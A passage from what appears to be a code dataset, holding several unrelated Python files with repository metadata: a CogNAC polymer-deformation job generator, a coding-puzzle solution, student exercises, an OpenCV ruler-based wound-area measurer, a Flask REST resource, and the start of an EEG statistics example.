f'_read_{var.read_udf.split(\".\")[0]:}'\n\n\tif os.path.exists(var.step_dir):\n\t\tprint(\"Use existing dir of \", var.step_dir)\n\telse:\n\t\tprint(\"Make new dir of \", var.step_dir)\n\t\tos.makedirs(var.step_dir)\n\treturn\n\ndef set_rotation_step():\n\tif var.step_deform == 'StepShear':\n\t\tvar.step_rotate = ['base', 'x', 'y', 'z', 'yx', 'zx']\n\telif var.step_deform == 'StepStretch':\n\t\tvar.step_rotate = ['base', 'x', 'y']\n\tfor rotate in var.step_rotate:\n\t\tset_rotate_dir(rotate)\n\t\tset_udf_batch(rotate)\n\t#\n\tif platform.system() == \"Windows\":\n\t\ttask = 'call calc_all.bat\\n'\n\t\tfilename = 'calc_all.bat'\n\t\t#\n\t\tif var.step_deform == 'StepStretch':\n\t\t\toption = f'evaluate_step_deform -f {var.func} -n {var.nu} -m stretch -a\\n'\n\t\telif var.step_deform == 'StepShear':\n\t\t\toption = f'evaluate_step_deform -f {var.func} -n {var.nu} -m shear -a\\n'\n\telif platform.system() == \"Linux\":\n\t\ttask = 'sh calc_all.sh &\\n'\n\t\tfilename = 'calc_all.sh'\n\t\toption = ''\n\t\t#\n\t\ttask2 = 'sh eval.sh\\n'\n\t\tfilename2 = 'eval_all.sh'\n\t\tif var.step_deform == 'StepStretch':\n\t\t\toption2 = f'step_deform.py -f {var.func} -n {var.nu} -m stretch -a\\n'\n\t\telif var.step_deform == 'StepShear':\n\t\t\toption2 = f'step_deform.py -f {var.func} -n {var.nu} -m shear -a\\n'\n\t\tmake_batch_series(var.step_dirlist, var.step_dir, task2, filename2, option2)\n\t\n\tmake_batch_series(var.step_dirlist, var.step_dir, task, filename, option)\n\treturn\n\ndef set_rotate_dir(rotate):\n\ttmp_dir = f'rotate_{rotate}'\n\tvar.step_dirlist.append(tmp_dir)\n\tvar.calc_dir = os.path.join(var.step_dir, tmp_dir)\n\tif os.path.exists(var.calc_dir):\n\t\tprint(\"Use existing dir of \", var.calc_dir)\n\telse:\n\t\tprint(\"Make new dir of \", var.calc_dir)\n\t\tos.makedirs(var.calc_dir)\n\tvar.base_udf = os.path.join(var.calc_dir, 'base.udf')\n\tu = UDFManager(var.read_udf)\n\tu.jump(1)\n\tu.eraseRecord(record_pos=0, record_num=u.totalRecord()-1)\n\tif rotate != 'base':\n\t\trotate_position(u, rotate)\n\tu.write(var.base_udf)\n\treturn\n\n# アトムのポジションを回転\ndef rotate_position(u, axis):\n\tR = rotate(axis, np.pi/2.)\n\tu.jump(u.totalRecord() - 1)\n\tpos = u.get('Structure.Position.mol[].atom[]')\n\tfor i, mol in enumerate(pos):\n\t\tfor j, atom in enumerate(mol):\n\t\t\ttmp = list(np.dot(np.array(R), np.array(atom)))\n\t\t\tu.put(tmp, 'Structure.Position.mol[].atom[]', [i, j])\n\treturn\n\ndef rotate(axis, deg):\n\tif axis == 'x':\n\t\tR = [\n\t\t\t[1., 0., 0.],\n\t\t\t[0., np.cos(deg), -1*np.sin(deg)],\n\t\t\t[0., np.sin(deg), np.cos(deg)]\n\t\t]\n\telif axis == 'y':\n\t\tR = [\n\t\t\t[np.cos(deg), 0., np.sin(deg)],\n\t\t\t[0., 1., 0.],\n\t\t\t[-1*np.sin(deg), 0., np.cos(deg)]\n\t\t]\n\telif axis == 'z':\n\t\tR = [\n\t\t\t[np.cos(deg), -1*np.sin(deg), 0.],\n\t\t\t[np.sin(deg), np.cos(deg), 0.],\n\t\t\t[0., 0., 1.]\n\t\t]\n\telif axis == 'yx':\n\t\tRy = [\n\t\t\t[np.cos(deg), 0., np.sin(deg)],\n\t\t\t[0., 1., 0.],\n\t\t\t[-1*np.sin(deg), 0., np.cos(deg)]\n\t\t]\n\t\tRx = [\n\t\t\t[1., 0., 0.],\n\t\t\t[0., np.cos(deg), -1*np.sin(deg)],\n\t\t\t[0., np.sin(deg), np.cos(deg)]\n\t\t]\n\t\tR = list(np.dot(np.array(Rx), np.array(Ry)))\n\telif axis == 'zx':\n\t\tRz = [\n\t\t\t[np.cos(deg), -1*np.sin(deg), 0.],\n\t\t\t[np.sin(deg), np.cos(deg), 0.],\n\t\t\t[0., 0., 1.]\n\t\t]\n\t\tRx = [\n\t\t\t[1., 0., 0.],\n\t\t\t[0., np.cos(deg), -1*np.sin(deg)],\n\t\t\t[0., np.sin(deg), np.cos(deg)]\n\t\t]\n\t\tR = list(np.dot(np.array(Rx), np.array(Rz)))\n\treturn R\n\ndef set_udf_batch(rotate):\n\t# UDFファイル名を設定\n\tbase = f'{var.step_deform}_until_' + f'{var.step_deform_max:.1e}'.replace('.', '_') + '_rate_' + f'{var.step_rate:.1e}'.replace('.', '_') + f'_{rotate}'\n\t#\n\tuin = 'deform_uin.udf'\n\tuout = uin.replace(\"uin\", \"out\")\n\tif platform.system() == \"Windows\":\n\t\tmake_title(var.title_name + '_' + base + \"_deform\")\n\t\tvar.batch = \"#!/bin/bash\\n\"\n\t\tvar.batch += var.ver_Cognac + ' -I ' + uin + ' -O ' + uout + ' -n ' + str(var.core) +' \\n'\n\telif platform.system() == \"Linux\":\n\t\tcalc_sh = '#PJM -L \"node=1\"\\n'\n\t\tcalc_sh += '#PJM -L \"rscgrp=small\"\\n'\n\t\tcalc_sh += '#PJM -L \"elapse=72:00:00\"\\n'\n\t\tcalc_sh += '#PJM -g hp220245\\n'\n\t\tcalc_sh += '#PJM -x PJM_LILO_GFSCACHE=/vol0004\\n'\n\t\tcalc_sh += '#PJM -S\\n'\n\t\tcalc_sh += 'export UDF_DEF_PATH=\"/vol0400/data/hp220245/octa/OCTA84/ENGINES/udf\"\\n'\n\t\tcalc_sh += 'COGNAC=\"/vol0400/data/hp220245/octa/OCTA84/ENGINES/bin/unknown/cognac112\"\\n\\n'\n\t\tcalc_sh += '${COGNAC} -I ' + uin + ' -O' + uout + ' -n 48 \\n'\n\t\t# バッチファイルを作成\n\t\twrite_batchfile(var.calc_dir, f'deform.sh', calc_sh)\n\t\t#\n\t\tcalc_all = \"#!/bin/bash\\n\"\n\t\tcalc_all += 'JID=`pjsub -z jid deform.sh`\\n'\n\t\tcalc_all += 'if [ $? -ne 0 ]; then\\n'\n\t\tcalc_all += 'exit 1\\n'\n\t\tcalc_all += 'fi\\n'\n\t\tcalc_all += 'set -- `pjwait $JID`\\n'\n\t\tcalc_all += 'if [ $2 != \"0\" -o $3 != \"0\" ]; then\\n'\n\t\tcalc_all += 'exit 1\\n'\n\t\tcalc_all += 'fi\\n'\n\tudf_in = os.path.join(var.calc_dir, uin)\n\tmake_stepdeform_udf(udf_in)\n\tprev_udf = uin.replace(\"uin\", \"out\")\n\n\t# 各放置時間における緩和計算を設定\n\tfor i, condition in enumerate(var.step_relaxation):\n\t\tuin = f'relaxation_{i}_uin.udf'\n\t\tuout = uin.replace(\"uin\", \"out\")\n\t\tif platform.system() == \"Windows\":\n\t\t\tmake_title(var.title_name + '_' + base + f'_relaxation_{i}')\n\t\t\tvar.batch += var.ver_Cognac + ' -I ' + uin + ' -O ' + uout + ' -n ' + str(var.core) +' \\n'\n\t\telif platform.system() == \"Linux\":\n\t\t\tcalc_sh = '#PJM -L \"node=1\"\\n'\n\t\t\tcalc_sh += '#PJM -L \"rscgrp=small\"\\n'\n\t\t\tcalc_sh += '#PJM -L \"elapse=72:00:00\"\\n'\n\t\t\tcalc_sh += '#PJM -g hp220245\\n'\n\t\t\tcalc_sh += '#PJM -x PJM_LILO_GFSCACHE=/vol0004\\n'\n\t\t\tcalc_sh += '#PJM -S\\n'\n\t\t\tcalc_sh += 'export UDF_DEF_PATH=\"/vol0400/data/hp220245/octa/OCTA84/ENGINES/udf\"\\n'\n\t\t\tcalc_sh += 'COGNAC=\"/vol0400/data/hp220245/octa/OCTA84/ENGINES/bin/unknown/cognac112\"\\n\\n'\n\t\t\tcalc_sh += '${COGNAC} -I ' + uin + ' -O' + uout + ' -n 48 \\n'\n\t\t\t# バッチファイルを作成\n\t\t\twrite_batchfile(var.calc_dir, f'relaxation_{i:}.sh', calc_sh)\n\t\t\t#\n\t\t\tcalc_all += f'pjsub relaxation_{i:}.sh\\n'\n\t\tudf_in = os.path.join(var.calc_dir, uin)\n\t\tmake_steprelax_udf(udf_in, prev_udf, condition)\n\t\n\t# 最長の緩和計算のUDFをリスタートにして長時間計算を繰り返す。\n\trepeat = var.step_repeat[0]\n\tfor i in range(repeat):\n\t\tcondition = var.step_repeat[1:]\n\t\tuin = f'repeat_{i}_uin.udf'\n\t\tudf_in = os.path.join(var.calc_dir, uin)\n\t\tuout = uin.replace(\"uin\", \"out\")\n\t\tif platform.system() == \"Windows\":\n\t\t\tmake_title(var.title_name + '_' + base + f'_repeat_{i}')\n\t\t\tvar.batch += var.ver_Cognac + ' -I ' + uin + ' -O ' + uout + ' -n ' + str(var.core) +' \\n'\n\t\telif platform.system() == \"Linux\":\n\t\t\tcalc_sh = '#PJM -L \"node=1\"\\n'\n\t\t\tcalc_sh += '#PJM -L \"rscgrp=small\"\\n'\n\t\t\tcalc_sh += '#PJM -L \"elapse=72:00:00\"\\n'\n\t\t\tcalc_sh += '#PJM -g hp220245\\n'\n\t\t\tcalc_sh += '#PJM -x PJM_LILO_GFSCACHE=/vol0004\\n'\n\t\t\tcalc_sh += '#PJM -S\\n'\n\t\t\tcalc_sh += 'export UDF_DEF_PATH=\"/vol0400/data/hp220245/octa/OCTA84/ENGINES/udf\"\\n'\n\t\t\tcalc_sh += 'COGNAC=\"/vol0400/data/hp220245/octa/OCTA84/ENGINES/bin/unknown/cognac112\"\\n\\n'\n\t\t\tcalc_sh += '${COGNAC} -I ' + uin + ' -O' + uout + ' -n 48 \\n'\n\t\t\t# バッチファイルを作成\n\t\t\twrite_batchfile(var.calc_dir, f'repeat_{i:}.sh', calc_sh)\n\t\t\t#\n\t\t\tcalc_all += f'JID=`pjsub -z jid repeat_{i:}.sh`\\n'\n\t\t\tcalc_all += 'if [ $? -ne 0 ]; then\\n'\n\t\t\tcalc_all += 'exit 1\\n'\n\t\t\tcalc_all += 'fi\\n'\n\t\t\tcalc_all += 'set -- `pjwait $JID`\\n'\n\t\t\tcalc_all += 'if [ $2 != \"0\" -o $3 != \"0\" ]; then\\n'\n\t\t\tcalc_all += 'exit 1\\n'\n\t\t\tcalc_all += 'fi\\n'\n\t\tmake_steprelax_udf(udf_in, prev_udf, condition)\n\t\tprev_udf = uin.replace(\"uin\", \"out\")\n\t#\n\tif platform.system() == \"Windows\":\n\t\tif var.step_deform == 'StepStretch':\n\t\t\tvar.batch += f'evaluate_step_deform -f {var.func} -n {var.nu} -m stretch\\n'\n\t\telif var.step_deform == 'StepShear':\n\t\t\tvar.batch += f'evaluate_step_deform -f {var.func} -n {var.nu} -m shear\\n'\n\t\t# バッチファイルを作成\n\t\twrite_batchfile(var.calc_dir, 'deform.bat', var.batch)\n\telif platform.system() == \"Linux\":\n\t\teval = \"#!/bin/bash\\n\"\n\t\tif var.step_deform == 'StepStretch':\n\t\t\teval += f'step_deform.py -f {var.func} -n {var.nu} -m stretch\\n'\n\t\telif var.step_deform == 'StepShear':\n\t\t\teval += f'step_deform.py -f {var.func} -n {var.nu} -m shear\\n'\n\t\twrite_batchfile(var.calc_dir, 'eval.sh', eval)\n\t\twrite_batchfile(var.calc_dir, 'calc_all.sh', calc_all)\n\treturn\n\n#-----\ndef make_stepdeform_udf(udf_in):\n\tu = UDFManager(var.base_udf)\n\t# goto global data\n\tu.jump(-1)\n\n\t# Dynamics_Conditions\n\tp = 'Simulation_Conditions.Dynamics_Conditions.'\n\tu.put(100000.,\t\tp + 'Max_Force')\n\tu.put(var.step_deform_time[0],\tp + 'Time.delta_T')\n\tu.put(var.step_deform_time[1],\tp + 'Time.Total_Steps')\n\tu.put(var.step_deform_time[2],\tp + 'Time.Output_Interval_Steps')\n\tu.put(1.0,\t\t\tp + 'Temperature.Temperature')\n\tu.put(0, \t\t\tp + 'Temperature.Interval_of_Scale_Temp')\n\tu.put(0,\t\t\tp + 'Pressure_Stress.Pressure')\n\n\t# Deformation\n\tif var.step_deform == 'StepStretch':\n\t\tp = \"Simulation_Conditions.Dynamics_Conditions.Deformation.\"\n\t\tu.put('Cell_Deformation', \t\tp + 'Method')\n\t\tu.put('Simple_Elongation', \t\tp + 'Cell_Deformation.Method')\n\t\tu.put('Initial_Strain_Rate', \tp + 'Cell_Deformation.Simple_Elongation.Input_Method')\n\t\tu.put(var.step_rate,\t \t\t\t\t\tp + 'Cell_Deformation.Simple_Elongation.Initial_Strain_Rate.Rate')\n\t\tif var.step_deform_max < 1:\n\t\t\tu.put(-1*var.step_rate,\t \t\t\t\t\tp + 'Cell_Deformation.Simple_Elongation.Initial_Strain_Rate.Rate')\n\t\tu.put(0.5, \t\t\t\t\t\tp + 'Cell_Deformation.Simple_Elongation.Poisson_Ratio')\n\t\tu.put('z', \t\t\t\t\t\tp + 'Cell_Deformation.Simple_Elongation.Axis')\n\t\tu.put(1, \t\t\t\t\t\tp + 'Cell_Deformation.Interval_of_Deform')\n\t\tu.put(0, \t\t\t\t\t\tp + 'Cell_Deformation.Deform_Atom')\n\telif var.step_deform == 'StepShear':\n\t\tp = \"Simulation_Conditions.Dynamics_Conditions.Deformation.\"\n\t\tu.put('Lees_Edwards', \tp + 'Method')\n\t\tu.put('Steady', \t\tp + 'Lees_Edwards.Method')\n\t\tu.put(var.step_rate, \t\t\tp + 'Lees_Edwards.Steady.Shear_Rate')\n\t\n\t# Output_Flags\n\tu.put([1, 1, 1], 'Simulation_Conditions.Output_Flags.Structure')\n\n\t# Read_Set_of_Molecules\n\tp = 'Initial_Structure.Read_Set_of_Molecules'\n\tu.put(['', -1], p)\n\n\t# Generate_Method\n\tp = 'Initial_Structure.Generate_Method.'\n\tu.put('Restart', \t\tp + 'Method')\n\tu.put(['', -1, 1, 1], \tp + 'Restart')\n\n\t# Relaxation\n\tp = 'Initial_Structure.Relaxation.'\n\tu.put(0, p + 'Relaxation')\n\t#--- Write UDF ---\n\tu.write(udf_in)\n\treturn\n\n#-----\ndef make_steprelax_udf(udf_in, prev_udf, condition):\n\tu = UDFManager(var.base_udf)\n\t# goto global data\n\tu.jump(-1)\n\n\t# Dynamics_Conditions\n\tp = 'Simulation_Conditions.Dynamics_Conditions.'\n\tu.put(100000.,\t\tp + 'Max_Force')\n\tu.put(var.sim_time_div,\tp + 'Time.delta_T')\n\tu.put(round(condition[0]/var.sim_time_div),\tp + 'Time.Total_Steps')\n\tu.put(round(condition[0]/var.sim_time_div/condition[1]),\tp + 'Time.Output_Interval_Steps')\n\tu.put(1.0,\t\t\tp + 'Temperature.Temperature')\n\tu.put(0, \t\t\tp + 'Temperature.Interval_of_Scale_Temp')\n\tu.put(0,\t\t\tp + 'Pressure_Stress.Pressure')\n\n\t# Output_Flags\n\tu.put([1, 1, 1], 'Simulation_Conditions.Output_Flags.Structure')\n\t\n\t# Read_Set_of_Molecules\n\tp = 'Initial_Structure.Read_Set_of_Molecules'\n\tu.put([prev_udf, -1], p)\n\n\t# Generate_Method\n\tp = 'Initial_Structure.Generate_Method.'\n\tu.put('Restart', \t\tp + 'Method')\n\tu.put([prev_udf, -1, 1, 1], \tp + 'Restart')\n\n\t# Relaxation\n\tp = 'Initial_Structure.Relaxation.'\n\tu.put(0, p + 'Relaxation')\n\t#--- Write UDF ---\n\tu.write(udf_in)\n\treturn\n\n###########################################\n# ターミナルのタイトルを設定\ndef make_title(title):\n\tif platform.system() == \"Windows\":\n\t\tvar.batch += \"title \" + title + \"\\n\"\n\telif platform.system() == \"Linux\":\n\t\tvar.batch += r'echo -ne \"\\033]0; ' + title + ' \\007\"' + '\\n'\n\treturn\n#\ndef write_batchfile(dir, filename, batch_file):\n\t# バッチファイルを作成\n\tf_batch = os.path.join(dir, filename)\n\twith open(f_batch, 'w') as f:\n\t\tf.write(batch_file)\n\tif platform.system() == \"Linux\":\n\t\tos.chmod(f_batch, 0o744)\n\treturn\n\n#######################################\n# サブディレクトリを使うバッチファイルを作成\ndef make_batch_series(subdir_list, dir, task, filename, option):\n\tbatch_series = ''\n\tfor subdir in subdir_list:\n\t\tif platform.system() == \"Windows\":\n\t\t\tbatch_series += 'cd /d %~dp0\\\\' + subdir +'\\n'\n\t\t\tbatch_series += task\n\t\t\tbatch_series += 'cd /d %~dp0\\n'\n\t\telif platform.system() == \"Linux\":\n\t\t\tbatch_series += 'cd ./' + subdir +'\\n'\n\t\t\tbatch_series += task\n\t\t\tbatch_series += 'cd ../\\n'\n\tif option != '':\n\t\tbatch_series += option\n\twrite_batchfile(dir, filename, batch_series)\n\treturn\n\n##########################\n# Main\nif __name__=='__main__':\n\tdeform()","repo_name":"softmatter-design/python-cognac-deform","sub_path":"src/cognac_deform/DeformSetup.py","file_name":"DeformSetup.py","file_ext":"py","file_size_in_byte":39800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"12553183868","text":"\"\"\"\n @ Baek 10610. 30\n @ Prob. https://www.acmicpc.net/problem/10610\n Ref. \n @ Algo: Greedy\n @ Start day: 20. 08. 26.\n @ End day: 20. 08. 26.\n\"\"\"\n\n\n\nN = [int(i) for i in input()]\nN.sort(reverse=True)\nif N[-1] == 0 and sum(N) % 3 == 0:\n print(\"\".join(map(str, N)))\nelse:\n print(-1)\n\n\n\"\"\"\n102\n>\n210\n\"\"\"\n\n","repo_name":"KoEonYack/LevelUp-Algorithm","sub_path":"Greedy/Baek_10610_2.py","file_name":"Baek_10610_2.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"19"} +{"seq_id":"16759362098","text":"#assisgnment 6.1\r\nclass Bank_account:\r\n def __init__(self):\r\n self.balance = 0\r\n print('HELLO!!!! Welcome To The Deposit & Withdrawal Machine')\r\n\r\n def Deposit(self):\r\n amount = float(input(\"Enter amount to be deposited:\"))\r\n self.balance += amount\r\n print(\"\\n Amount Deposited: \",amount)\r\n\r\n def withdraw(self):\r\n amount = float(input(\"Enter amount to be Withdrawn:\"))\r\n if self.balance >= amount:\r\n self.balance -= amount\r\n print(\"\\n You withdrew: \",amount)\r\n else:\r\n print(\"\\n Insufficient Balance \")\r\n def display(self):\r\n print(\"\\n Net Available Balance = \",self.balance)\r\ns = Bank_account()\r\ns.Deposit()\r\ns.withdraw()\r\ns.display()\r\n\r\n\"\"\"\r\nOUTPUT\r\n\r\nHELLO!!!! Welcome To The Deposit & Withdrawal Machine\r\nEnter amount to be deposited:5000\r\n\r\n Amount Deposited: 5000.0\r\nEnter amount to be Withdrawn:1000\r\n\r\n You withdrew: 1000.0\r\n\r\n Net Available Balance = 4000.0\r\n \r\n \"\"\"\r\n\r\n#assisgnment 6.2\r\n\r\nimport math\r\npi = math.pi\r\ndef volume (radius,height):\r\n return (1/3)*pi*radius*radius*height\r\ndef surfacearea (radius,slantheight):\r\n return pi*radius*slantheight+pi*radius*radius\r\nradius = float(5)\r\nheight = float(12)\r\nslantheight = float(10)\r\nprint(\"volume of cone :\" ,volume(radius,height))\r\nprint(\"surface area of cone : \" ,surfacearea(radius,slantheight))\r\n\r\n\"\"\"\r\noutput\r\n\r\nvolume of cone : 314.15926535897927\r\nsurface area of cone : 235.61944901923448\r\n\"\"\"\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Priyankashirsat123/LetsUpgrade-Python_B7","sub_path":"assii6.py","file_name":"assii6.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"15653234017","text":"import cv2\nimport numpy as np \nimport glob\nimport matplotlib.pyplot as plt\nimport imutils\nfrom scipy import signal\n\ndef find_contour(hsv,low,high,img,center):\n mask = cv2.inRange(hsv,low,high)\n kernel = np.ones((5,5),np.uint8)\n opening = cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel,iterations=4)\n plt.imshow(opening,cmap='gray')\n plt.show()\n \n cnts = cv2.findContours(opening.copy(), cv2.RETR_EXTERNAL,\n\tcv2.CHAIN_APPROX_SIMPLE)\n cnts = imutils.grab_contours(cnts)\n rect_img = img.copy()\n for c in cnts: \n rect = cv2.minAreaRect(c)\n box = cv2.boxPoints(rect)\n box = np.int0(box)\n # cv2.drawContours(rect_img,[box],0,(0,0,255),1)\n # plt.imshow(rect_img[:,:,(2,1,0)])\n # plt.show()\n M = cv2.moments(c)\n cX = int(M['m10'] / M['m00'])\n cY = int(M['m01'] / M['m00'])\n \n center.append([cY,cX,box])\n \n \n return cnts,center\n\n\ndef sharpen(img, sigma=300): \n # sigma = 5、15、25\n blur_img = cv2.GaussianBlur(img, (0, 0), sigma)\n usm = cv2.addWeighted(img, 1.5, blur_img, -0.5, 0)\n return usm\n\ndef cropImage(point,image,position_blue):\n crop_image = image.copy()\n \"\"\"Get width and height distances\"\"\"\n w = abs(point[0][2][0] - point[0][2][1])\n h = abs(point[0][2][1] - point[0][2][2])\n width_len = 0\n height_len = 0\n\n if w[0] != 0 and w[0] > w[1]:\n width_len = w[0]\n elif w[1] != 0:\n width_len = w[1]\n if h[0] != 0 and h[0] > h[1] :\n height_len = h[0]\n elif h[1] != 0:\n height_len = h[1]\n \n \n if position_blue == 'left': \n crop=crop_image[point[1][:2][0]-int(height_len/2):point[1][:2][0]+int(width_len/2),point[1][:2][1]+int(height_len/2):point[1][:2][1]+int(1.5*height_len)]\n \n elif position_blue == 'down': #find right block\n crop=crop_image[point[1][:2][0]-int(height_len/2):point[1][:2][0]+int(height_len/2),point[1][:2][1]+int(height_len/2):point[1][:2][1]+int(height_len)+int(height_len/2)]\n \n elif position_blue == 'right':\n crop=crop_image[point[1][:2][0]-int(height_len/2):point[1][:2][0]+int(width_len/2),point[1][:2][1]-int(1.5*height_len):point[1][:2][1]-int(height_len/2)]\n \n elif position_blue == 'upper':\n crop=crop_image[point[1][:2][0]-int(height_len/2):point[1][:2][0]+int(height_len/2),point[1][:2][1]-int(height_len)-int(height_len/2):point[1][:2][1]-int(height_len/2)]\n\n sharp_crop = sharpen(crop)\n return sharp_crop\n\ndef getEdgeline(crop_img):\n \"\"\"crop_img : crop image, laplacian binary, and threshold\"\"\"\n gray_crop = cv2.cvtColor(crop_img,cv2.COLOR_BGR2GRAY)\n blurred_crop = cv2.bilateralFilter(gray_crop,5,75,75)\n\n # convolute with proper kernels\n laplacian_crop = cv2.Laplacian(blurred_crop,cv2.CV_64F)\n\n th,binary = cv2.threshold(laplacian_crop,5,255,cv2.THRESH_BINARY)\n binary = np.uint8(binary)\n\n return binary\n\ndef findLines(binary,crop):\n base = cv2.HoughLinesP(binary, 1, np.pi / 180,18, minLineLength=10, maxLineGap=12)\n pixel_array = []\n show_img = crop.copy()\n\n if base is not None:\n for line in base:\n x1, y1, x2, y2 = line[0]\n cv2.line(show_img, (x1, y1), (x2, y2), (0, 0, 255), 1)\n pixel_length = np.abs(x2 - x1)\n pixel_array.append([(x1, y1), (x2, y2)])\n \n return pixel_array\n\ndef findVertialLine(crop,line_array):\n \"\"\"\n crop:crop image,vertical_array: line position\n return vertical_line: vertical line axis\n \"\"\"\n vertical_line = [] \n line_img = crop.copy()\n\n for i in range(len(line_array)):\n point1 = line_array[i][0]\n point2 = line_array[i][1]\n \n if point1[0] != point2[0]:\n slope = (point2[1] - point1[1]) / ( point1[0] - point2[0])\n else:\n slope = 0\n \n # Center point coordinates\n midpoint = (int((point1[0]+point2[0]) /2) ,int((point1[1]+point2[1]) /2))\n \n x1 = point1[0] -60 \n x2 = point1[0] +60\n \n y1 = int(slope * ( x1 - midpoint[0]) + midpoint[1] )\n y2 = int(slope * ( x2 - midpoint[0]) + midpoint[1] )\n \n vertical_line.append([slope,(x2,y2),(x1,y1),midpoint])\n cv2.line(line_img,(x2,y2),(x1,y1),(0,0,255),1)\n \n return vertical_line\n\ndef getFrequencyLine(vertical_array,crop):\n save_paraline = []\n for i in range(len(vertical_array)):\n s = vertical_array[i][0] # slope\n if s == 0 : #leaving a slope of 0\n save_paraline.append(vertical_array[i])\n\n line_save_posit = []\n temp = 255\n for line in range(len(save_paraline)):\n line_img2 = crop.copy()\n hsv_2 = crop.copy()\n hsv_2 = cv2.cvtColor(hsv_2,cv2.COLOR_BGR2HSV)\n h,s,v = cv2.split(hsv_2)\n #Sort the midpoint on the y-axis\n save_paraline.sort(key=lambda x:x[3][1])\n\n # Change negative image, find wave crest\n pixel_value = []\n test = crop.copy()\n gray = cv2.cvtColor(test,cv2.COLOR_BGR2GRAY)\n negative = 255-gray #negative image\n W = crop.shape[1]\n line_ = save_paraline[line][1][1]\n \n if line_ > 3 and W-line_ >4:\n for w in range(W):\n if s[line_][w] < 80:\n pixel_value.append(negative[line_][w])\n \n num_peak_3 = signal.find_peaks(pixel_value ,height=70, distance=2)\n print(num_peak_3[0])\n if len(num_peak_3[0]) < 3:\n print('not this line!!')\n continue\n elif len(num_peak_3[0]) >= 4:\n print('the number of peaks is ' + str(len(num_peak_3[0])))\n \n # Several crests represent several 0.1cm\n diffPixel = num_peak_3[0][-1] - num_peak_3[0][0]\n line_save_posit.append([line_,diffPixel,len(num_peak_3[0])-1,num_peak_3[0]])\n break\n return line_save_posit\n\ndef calculatePix(objectMask,pixel):\n w,h = objectMask.shape[:2]\n num = 0 #pixel total number\n for i in range(w):\n for j in range(h):\n if objectMask[i][j] == pixel:\n num +=1\n return num\n\ndef getMaskBoundary(wound,msk_path): \n wound_image = wound.copy()\n gray2 = cv2.cvtColor(wound_image,cv2.COLOR_BGR2GRAY)\n \n objectPixel = calculatePix(gray2,255)\n return objectPixel\n \ndef calculateArea(line_array,objectPixel):\n \n ratio_pixel_cm = line_array[0][1]* line_array[0][1]\n real_area = round(int(line_array[0][2])/10 * int(line_array[0][2])/10,3)\n area = objectPixel * real_area / ratio_pixel_cm\n\n return area\n\nif __name__ == \"__main__\":\n \n img_path = 'image'\n msk_path = 'label'\n image =cv2.imread(img_path)\n image = cv2.resize(image,(600,600))\n wound = cv2.imread(msk_path,1)\n wound = cv2.resize(wound,(600,600))\n img_ = image.copy()\n crop = img_[390:440,310:360] #Find your own place \n \n binarzie = getEdgeline(crop) \n line_array = findLines(binarzie,crop)\n vertical_array = findVertialLine(crop,line_array)\n point_posit = getFrequencyLine(vertical_array,crop)\n objectPixel = getMaskBoundary(wound,msk_path)\n realArea = calculateArea(point_posit,objectPixel)\n \n print(\"Final area\",realArea)","repo_name":"luacy200820/Ruler-detection","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"3760900041","text":"from datetime import datetime\r\nfrom flask_restful import Resource, reqparse, abort\r\nfrom models.questions import Question\r\nfrom flask_jwt_extended import jwt_required\r\nfrom app import db\r\n\r\nparser = reqparse.RequestParser()\r\nparser.add_argument('vote_id', type=int, required=True, help=\"vote_id обязательное поле\")\r\nparser.add_argument('content', type=str, required=True, help=\"content обязательное поле\")\r\nparser.add_argument('datevote', type=str, required=True, help=\"datevote обязательное поле\")\r\n\r\n\r\nclass QuestionResource(Resource):\r\n @jwt_required()\r\n def get(self, question_id):\r\n return Question.serialize(\r\n Question.query.filter_by(id=question_id).first_or_404(\r\n description='Question не найден'\r\n )\r\n )\r\n\r\n @jwt_required()\r\n def put(self, question_id):\r\n question = Question.query.filter_by(id=question_id).first_or_404(\r\n description='Question не найден'\r\n )\r\n args = parser.parse_args()\r\n\r\n question.vote_id = args['vote_id']\r\n question.datevote = datetime.strptime(args['datevote'], \"%Y-%m-%d\")\r\n question.content = args['content']\r\n db.session.commit()\r\n\r\n return {'msg': 'OK', 'data': question.serialize()}, 200\r\n\r\n @jwt_required()\r\n def delete(self, question_id):\r\n Question.query.filter_by(id=question_id).first_or_404(\r\n description='Question не найден'\r\n )\r\n\r\n Question.query.filter_by(id=question_id).delete()\r\n db.session.commit()\r\n return {'msg': 'Question удален'}, 200\r\n\r\n\r\nclass QuestionListResource(Resource):\r\n @jwt_required()\r\n def post(self):\r\n args = parser.parse_args()\r\n question = Question(vote_id=args['vote_id'], datevote=datetime.strptime(args['datevote'], \"%Y-%m-%d\"), content=args['content'])\r\n db.session.add(question)\r\n db.session.commit()\r\n return {'msg': 'OK', 'data': question.serialize()}, 201\r\n\r\n @jwt_required()\r\n def get(self):\r\n questions = Question.query.all()\r\n return [Question.serialize(item) for item in questions]","repo_name":"Octopus1773/flask-rest","sub_path":"resources/questions.py","file_name":"questions.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"19049813800","text":"\"\"\"\n====================================================================\nOne Way manova\n====================================================================\n\nOne way manova to compare Left vs Right.\n\"\"\"\nimport seaborn as sns\n\nfrom time import time\nfrom matplotlib import pyplot as plt\n\nfrom mne import Epochs, pick_types, events_from_annotations\nfrom mne.io import concatenate_raws\nfrom mne.io.edf import read_raw_edf\nfrom mne.datasets import eegbci\n\nfrom pyriemann.stats import PermutationDistance, PermutationModel\nfrom pyriemann.estimation import Covariances\nfrom pyriemann.spatialfilters import CSP\n\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.linear_model import LogisticRegression\n\nsns.set_style('whitegrid')\n###############################################################################\n# Set parameters and read data\n\n# avoid classification of evoked responses by using epochs that start 1s after\n# cue onset.\ntmin, tmax = 1., 3.\nevent_id = dict(hands=2, feet=3)\nsubject = 1\nruns = [6, 10, 14] # motor imagery: hands vs feet\n\nraw_files = [\n read_raw_edf(f, preload=True, verbose=False)\n for f in eegbci.load_data(subject, runs)\n]\nraw = 